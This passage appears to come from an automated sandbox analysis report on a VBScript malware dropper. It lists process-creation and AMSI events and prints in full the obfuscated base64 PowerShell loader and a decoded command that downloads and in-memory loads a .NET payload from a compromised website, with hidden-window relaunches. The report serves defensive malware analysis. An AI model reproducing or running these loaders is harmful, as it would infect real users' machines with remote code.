                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                        Data Obfuscation

                        barindex
                        VBScript performs obfuscated calls to suspicious functions
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell $ExeNy = 'J?Bi?Gk?awB5?Gc?I??9?C??Jw?w?DE?Mw?n?Ds?J?Br?G4?dwBt", "0", "false");
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell $ExeNy = 'J?Bi?Gk?awB5?Gc?I??9?C??Jw?w?DE?Mw?n?Ds?J?Br?G4?dwBt", "0", "false");
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell $ExeNy = 'J?Bi?Gk?awB5?Gc?I??9?C??Jw?w?DE?Mw?n?Ds?J?Br?G4?dwBt", "0", "false");
                        .NET source code contains potential unpacker
                        Source: 3.2.powershell.exe.29b1bb69730.2.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                        Source: 3.2.powershell.exe.29b1a88d8c0.1.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                        Source: 3.2.powershell.exe.29b32a20000.4.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                        Source: 21.2.powershell.exe.23a3ac26860.1.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                        Source: 21.2.powershell.exe.23a3b3ccdd8.2.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                        Source: 36.2.powershell.exe.1b994479a60.2.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                        Source: 36.2.powershell.exe.1b993cd6900.0.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
                        Found suspicious powershell code related to unpacking or dynamic code loading
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $ExeNy = 'J?Bi?Gk?awB5?Gc?I??9?C??Jw?w?DE?Mw?n?Ds?J?Br?G4?dwBt?Hg?I??9?C??Jw?l?H??egBB?GM?TwBn?Ek?bgBN?HI?JQ?n?Ds?WwBC?Hk?d?Bl?Fs?XQBd?C??J?Bu?HU?c?Bj?HM?I??9?C??WwBz?Hk?cwB0?GU?bQ?u?EM?bwBu?HY?ZQBy?HQ?XQ?6?Do?RgBy?G8?bQBC?GE?cwBl?DY?N?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?HM?Og?v?C8?dwB3?Hc?LgBp?G4?ZgBv?HI?bQBh?GM?aQBv?G4?bwBw?G8?cgB0?HU?bgBh?C4?YwBv?G0?LwB3?H??LQBj?G8?bgB0?GU?bgB0?C8?dQBw?Gw?bwBh?GQ?cw?v?DI?M??y?DQ?Lw?w?Dk?LwBk?Gw?b?Bz?Gs?eQBm?GE?b??u?HQ?e?B0?Cc?KQ?p?Ds?WwBz?Hk?cwB0?GU?bQ?u?EE?c?Bw?EQ?bwBt?GE?aQBu?F0?Og?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?J?Bu?HU?c?Bj?HM?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?EM?b?Bh?HM?cwBM?Gk?YgBy?GE?cgB5?DE?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?WgB4?Es?S?BH?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?cwBv?GM?bQBl?HI?Lw?3?D??Lw?0?DI?M??y?C8?cwBk?GE?bwBs?H??dQ?v?HQ?bgBl?HQ?bgBv?GM?LQBw?Hc?LwBt?G8?Yw?u?GE?bgB1?HQ?cgBv?H??bwBu?G8?aQBj?GE?bQBy?G8?ZgBu?Gk?LgB3?Hc?dw?v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?Gs?bgB3?G0?e??g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?YgBp?Gs?eQBn?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;$global:?
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $ExeNy = 'J?Bi?Gk?awB5?Gc?I??9?C??Jw?w?DE?Mw?n?Ds?J?Br?G4?dwBt?Hg?I??9?C??Jw?l?H??egBB?GM?TwBn?Ek?bgBN?HI?JQ?n?Ds?WwBC?Hk?d?Bl?Fs?XQBd?C??J?Bu?HU?c?Bj?HM?I??9?C??WwBz?Hk?cwB0?GU?bQ?u?EM?bwBu?HY?ZQBy?HQ?XQ?6?Do?RgBy?G8?bQBC?GE?cwBl?DY?N?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?HM?Og?v?C8?dwB3?Hc?LgBp?G4?ZgBv?HI?bQBh?GM?aQBv?G4?bwBw?G8?cgB0?HU?bgBh?C4?YwBv?G0?LwB3?H??LQBj?G8?bgB0?GU?bgB0?C8?dQBw?Gw?bwBh?GQ?cw?v?DI?M??y?DQ?Lw?w?Dk?LwBk?Gw?b?Bz?Gs?eQBm?GE?b??u?HQ?e?B0?Cc?KQ?p?Ds?WwBz?Hk?cwB0?GU?bQ?u?EE?c?Bw?EQ?bwBt?GE?aQBu?F0?Og?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?J?Bu?HU?c?Bj?HM?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?EM?b?Bh?HM?cwBM?Gk?YgBy?GE?cgB5?DE?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?WgB4?Es?S?BH?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?cwBv?GM?bQBl?HI?Lw?3?D??Lw?0?DI?M??y?C8?cwBk?GE?bwBs?H??dQ?v?HQ?bgBl?HQ?bgBv?GM?LQBw?Hc?LwBt?G8?Yw?u?GE?bgB1?HQ?cgBv?H??bwBu?G8?aQBj?GE?bQBy?G8?ZgBu?Gk?LgB3?Hc?dw?v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?Gs?bgB3?G0?e??g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?YgBp?Gs?eQBn?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;$global:?
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $ExeNy = 'J?Bi?Gk?awB5?Gc?I??9?C??Jw?w?DE?Mw?n?Ds?J?Br?G4?dwBt?Hg?I??9?C??Jw?l?H??egBB?GM?TwBn?Ek?bgBN?HI?JQ?n?Ds?WwBC?Hk?d?Bl?Fs?XQBd?C??J?Bu?HU?c?Bj?HM?I??9?C??WwBz?Hk?cwB0?GU?bQ?u?EM?bwBu?HY?ZQBy?HQ?XQ?6?Do?RgBy?G8?bQBC?GE?cwBl?DY?N?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?HM?Og?v?C8?dwB3?Hc?LgBp?G4?ZgBv?HI?bQBh?GM?aQBv?G4?bwBw?G8?cgB0?HU?bgBh?C4?YwBv?G0?LwB3?H??LQBj?G8?bgB0?GU?bgB0?C8?dQBw?Gw?bwBh?GQ?cw?v?DI?M??y?DQ?Lw?w?Dk?LwBk?Gw?b?Bz?Gs?eQBm?GE?b??u?HQ?e?B0?Cc?KQ?p?Ds?WwBz?Hk?cwB0?GU?bQ?u?EE?c?Bw?EQ?bwBt?GE?aQBu?F0?Og?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?J?Bu?HU?c?Bj?HM?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?EM?b?Bh?HM?cwBM?Gk?YgBy?GE?cgB5?DE?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?WgB4?Es?S?BH?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?cwBv?GM?bQBl?HI?Lw?3?D??Lw?0?DI?M??y?C8?cwBk?GE?bwBs?H??dQ?v?HQ?bgBl?HQ?bgBv?GM?LQBw?Hc?LwBt?G8?Yw?u?GE?bgB1?HQ?cgBv?H??bwBu?G8?aQBj?GE?bQBy?G8?ZgBu?Gk?LgB3?Hc?dw?v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?Gs?bgB3?G0?e??g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?YgBp?Gs?eQBn?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;$global:?
                        Suspicious powershell command line found
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec 